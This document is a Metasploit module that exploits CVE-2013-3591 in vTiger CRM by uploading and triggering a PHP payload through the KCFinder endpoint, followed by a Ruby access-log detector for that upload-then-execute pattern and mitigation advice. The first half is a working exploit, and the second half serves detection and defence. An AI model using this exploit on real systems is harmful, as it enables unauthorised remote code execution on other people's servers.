##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'vTigerCRM v5.4.0/v5.3.0 Authenticated Remote Code Execution',
      'Description'    => %q{
        vTiger CRM allows an authenticated user to upload files to embed within
        documents. Due to insufficient privileges on the 'files' upload folder,
        an attacker can upload a PHP script and execute arbitrary PHP code remotely.

        This module was tested against vTiger CRM v5.4.0 and v5.3.0.
      },
      'Author'         =>
        [
          'Brandon Perry <bperry.volatile[at]gmail.com>' # Discovery / msf module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2013-3591'],
          ['URL', 'https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats']
        ],
      'Privileged'     => false,
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Payload'        =>
        {
          'BadChars' => "&\n=+%",
        },
      'Targets'        =>
        [
          [ 'Automatic', { } ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Oct 30 2013'))

    register_options(
      [
        OptString.new('TARGETURI', [ true,  "Base vTiger CRM directory path", '/vtigercrm/']),
        OptString.new('USERNAME',  [ true,  "Username to authenticate with", 'admin']),
        OptString.new('PASSWORD',  [ false, "Password to authenticate with", 'admin'])
      ], self.class)
  end

  # Fingerprint the version from the "Powered by" footer of index.php.
  def check
    res = nil
    begin
      res = send_request_cgi({
        'uri' => normalize_uri(target_uri.path, '/index.php')
      })
    rescue
      print_error("Unable to access the index.php file")
      return CheckCode::Unknown
    end

    # send_request_cgi can also return nil without raising; guard both cases
    if res.nil? or res.code != 200
      print_error("Error accessing the index.php file")
      return CheckCode::Unknown
    end

    if res.body =~ /<div class="poweredBy">Powered by vtiger CRM - (.*)<\/div>/i
      print_status("vTiger CRM version: " + $1)
      case $1
      when '5.4.0', '5.3.0'
        return CheckCode::Vulnerable
      else
        return CheckCode::Safe
      end
    end

    return CheckCode::Unknown
  end

  def exploit
    # Fetch index.php once to obtain a session cookie
    init = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, '/index.php')
    })
    fail_with(Failure::Unreachable, "Unable to fetch index.php") if init.nil?

    sess = init.get_cookies

    # Authenticate with the configured credentials
    post = {
      'module'        => 'Users',
      'action'        => 'Authenticate',
      'return_module' => 'Users',
      'return_action' => 'Login',
      'user_name'     => datastore['USERNAME'],
      'user_password' => datastore['PASSWORD']
    }

    login = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path, '/index.php'),
      'vars_post' => post,
      'cookie'    => sess
    })
    fail_with(Failure::NoAccess, "Authentication request failed") if login.nil?

    fname   = rand_text_alphanumeric(rand(10) + 6) + '.php3'
    cookies = login.get_cookies

    php = %Q|<?php #{payload.encoded} ?>|

    # Multipart upload into the 'files' directory via the KCFinder browse endpoint
    data = Rex::MIME::Message.new
    data.add_part(php, 'application/x-php', nil, "form-data; name=\"upload\"; filename=\"#{fname}\"")
    data.add_part('files', nil, nil, 'form-data; name="dir"')
    data_post = data.to_s

    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => normalize_uri(target_uri.path, '/kcfinder/browse.php?type=files&lng=en&act=upload'),
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => data_post,
      'cookie' => cookies
    })

    if res and res.code == 200
      print_status("Triggering payload...")
      send_request_raw({ 'uri' => datastore["TARGETURI"] + "/test/upload/files/#{fname}" }, 5)
    end
  end
end
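The module above leaves a distinctive two-step trace in the web server's access log: an authenticated POST to the KCFinder upload action (`kcfinder/browse.php?...act=upload`) followed, from the same client, by a GET for a PHP-family file under `test/upload/files/`. The following detector, an added example that is not part of the Metasploit module or of vTiger, correlates those two events over Apache combined-format log lines. The log lines are constructed for the demonstration, the paths assume the module's default `TARGETURI` of `/vtigercrm/`, and the 600-second correlation window and the list of script extensions are assumptions to tune for your own PHP handler configuration.

```ruby
require 'time'

# Constructed sample Apache combined-format log lines (not from any real server).
# Client 10.0.0.5 shows the upload-then-execute pattern; 10.0.0.9 uploads a
# harmless document and must not raise an alert.
SAMPLE_LOG = <<~LOG
  10.0.0.5 - - [30/Oct/2013:10:15:01 +0000] "GET /vtigercrm/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
  10.0.0.5 - - [30/Oct/2013:10:15:02 +0000] "POST /vtigercrm/index.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
  10.0.0.5 - - [30/Oct/2013:10:15:03 +0000] "POST /vtigercrm/kcfinder/browse.php?type=files&lng=en&act=upload HTTP/1.1" 200 45 "-" "Mozilla/5.0"
  10.0.0.5 - - [30/Oct/2013:10:15:04 +0000] "GET /vtigercrm/test/upload/files/a8Kd3qZp.php3 HTTP/1.1" 200 12 "-" "Mozilla/5.0"
  10.0.0.9 - - [30/Oct/2013:10:20:00 +0000] "POST /vtigercrm/kcfinder/browse.php?type=files&lng=en&act=upload HTTP/1.1" 200 45 "-" "Mozilla/5.0"
  10.0.0.9 - - [30/Oct/2013:10:20:05 +0000] "GET /vtigercrm/test/upload/files/report.pdf HTTP/1.1" 200 88201 "-" "Mozilla/5.0"
LOG

# Apache combined log: client, ident, user, [timestamp], "METHOD PATH PROTO", status
LOG_RE = /\A(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})/

# The KCFinder upload action the module POSTs to
UPLOAD_RE = %r{/kcfinder/browse\.php\?(?:[^ ]*&)?act=upload}i

# A request for a server-side-executable file under the vTiger upload directory.
# .php3 is what the module uses; the other extensions are assumed extras that
# Apache's php handler is frequently configured to execute.
SCRIPT_IN_UPLOAD_DIR_RE = %r{/test/upload/files/[^/?]+\.(?:php\d?|phtml|phar)(?:\?|\z)}i

# Assumed correlation window (seconds) between the upload and the first hit on it
WINDOW = 600

def parse_line(line)
  m = LOG_RE.match(line) or return nil
  {
    ip:     m[1],
    time:   Time.strptime(m[2], '%d/%b/%Y:%H:%M:%S %z'),
    method: m[3],
    path:   m[4],
    status: m[5].to_i
  }
end

def parse_log(text)
  text.each_line.map { |l| parse_line(l.strip) }.compact
end

def upload_request?(e)
  e[:method] == 'POST' && UPLOAD_RE.match?(e[:path])
end

def script_request?(e)
  SCRIPT_IN_UPLOAD_DIR_RE.match?(e[:path])
end

# One alert per request for a PHP-family file under the upload directory that is
# preceded, from the same client and within WINDOW seconds, by an upload POST.
def find_webshell_uploads(text)
  alerts = []
  parse_log(text).group_by { |e| e[:ip] }.each do |ip, evs|
    evs     = evs.sort_by { |e| e[:time] }
    uploads = evs.select { |e| upload_request?(e) }
    evs.select { |e| script_request?(e) }.each do |s|
      prior = uploads.find { |u| u[:time] <= s[:time] && s[:time] - u[:time] <= WINDOW }
      next unless prior
      alerts << { ip: ip, upload_at: prior[:time], path: s[:path], status: s[:status] }
    end
  end
  alerts
end

if __FILE__ == $0
  find_webshell_uploads(SAMPLE_LOG).each do |a|
    puts "ALERT #{a[:ip]} uploaded at #{a[:upload_at].utc.iso8601} then requested #{a[:path]} (HTTP #{a[:status]})"
  end
end
```

A request for any executable file under the upload directory is worth an alert on its own, since that directory should only ever serve documents; the correlation here just raises confidence and attributes the upload to a session. The complementary fix on the server side is to deny script execution under the upload directory (for Apache, a handler-removing or `php_flag engine off` rule scoped to that path), which makes the second request fail even if the upload succeeds.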